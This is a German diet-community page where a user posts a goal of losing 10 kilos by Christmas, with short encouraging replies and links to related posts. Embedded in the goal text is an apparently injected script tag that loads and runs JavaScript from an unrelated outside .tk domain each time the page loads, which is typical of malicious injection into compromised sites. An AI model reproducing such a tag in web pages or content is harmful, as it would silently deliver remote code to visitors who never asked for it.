Zum Inhalt springen

Sie sind hier

10 Kilo bis Wihnachten

0  0
Ein Ziel im persönlichen Abnehmplan von , am geschrieben

Bei meinem Gewicht ist das ein realistisches Ziel denk ich! Also los gehts! 

<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Datum, bis zu dem das Ziel erreicht sein soll: 
24.12.2014
Ziel-Status: 
Ziel wird aktuell verfolgt

Kommentare

Bild des Benutzers laughy
0  0

Mir würden schon 4 Kilo bis dahin reichen..... wir schaffen unser Ziel...ich sag nur Abnehmchallange Smile

*** Das Leben ist zu kurz um aufzugeben ***

Bild des Benutzers Micio
0  0

bei meinem Gewicht sollten 10 Kilo schon drinn sein. Eigentlich nimmt man ja schneller ab umso schwerer man ist. Abnehmchallenge is ne gute Sache Wink

Bild des Benutzers laughy
0  0

jawoll,schakka:-)

*** Das Leben ist zu kurz um aufzugeben ***

Bild des Benutzers rebjul
0  0

Das schaffen wir, ich steige mit ein: 10 kg bis Weihnachten. Smile

Nach oben
Zur Hauptnavigation

Persönliche Ziele im AbnehmplanWir bei der Diät-Clique halten nichts davon, Dir einen fertigen Ernährungs- oder Diätplan vorzusetzen, in dem Dir für jeden Tag vorgeschrieben wird, was Du essen sollst. Der Abnehmplan bei der Diät-Clique funktioniert anders - erfahre hier mehr zum Abnehmplan.

Beiträge aus der Abnehmen-Community, die ebenfalls interessant sein könnten

Ziel für den Abnehmplan von EndlichSchlank2019: Ich fühl mich mit meinem Wunschgewicht sehr wohl. Mehr soll nicht mehr runter. Das passt einfach nicht zu mir.  Also, 2 Kilo sollen langfristig wieder drauf. Ohne dabei ungesund zu essen oder auf...
Ziel für den Abnehmplan von Juergen12053: Ich möchte wieder fitter für mich selbst werden, damit es mir leichter ist, ein in allen Dingen wieder aktives Leben zu führen. Erstes Etappen - Ziel: Start war am 31.07.17. Mein erstes Ziel soll es...
Eintrag in ein Ernährungstagebuch von Ingekarin70: ich komme meinem Ziel immer näher, heute morgen wog ich nur noch 67,2 kg, trotz 50g Weihnachtskekse täglich. Allen ein schönes Wochenende.
Eintrag in ein Ernährungstagebuch von EndlichSchlank2019: Ich bin wieder zu Hause bei meinem Freund und mache mir mal nen richtig ruhigen und schönen Tag daheim und mache bisschen Wellness Später wollte ich mich ein bisschen auf den Hometrainer schwingen....
Ziel für den Abnehmplan von Juergen12053: ... mit meinen Startgewicht von 121 kg am 31.07.17 bei einer Körpergröße von 173,5 cm fühle ich mich unwohl, unbeweglich, träge und ja auch unatraktiv - das möchte ich ändern - ... und mich ab heute...
Eintrag in ein Ernährungstagebuch von veilchen: Mittwoch Frühstück Haferbrei Mittags 3 Scheiben Toast mit Käse und Gurke Abends Salat mit ein wenig Feta Sport 40 min Crosstrainer Donnerstag Frühstück Haferbrei Mittags 3 Scheiben Toast mit Käse...

Gemeinsam abnehmen

Die Diät-Clique ist eine kostenlose Community rund ums Abnehmen:

Kostenlos abnehmen

Die Diät-Clique ist völlig kostenlos nutzbar. Du kannst

Neue Abnehmen-Tipps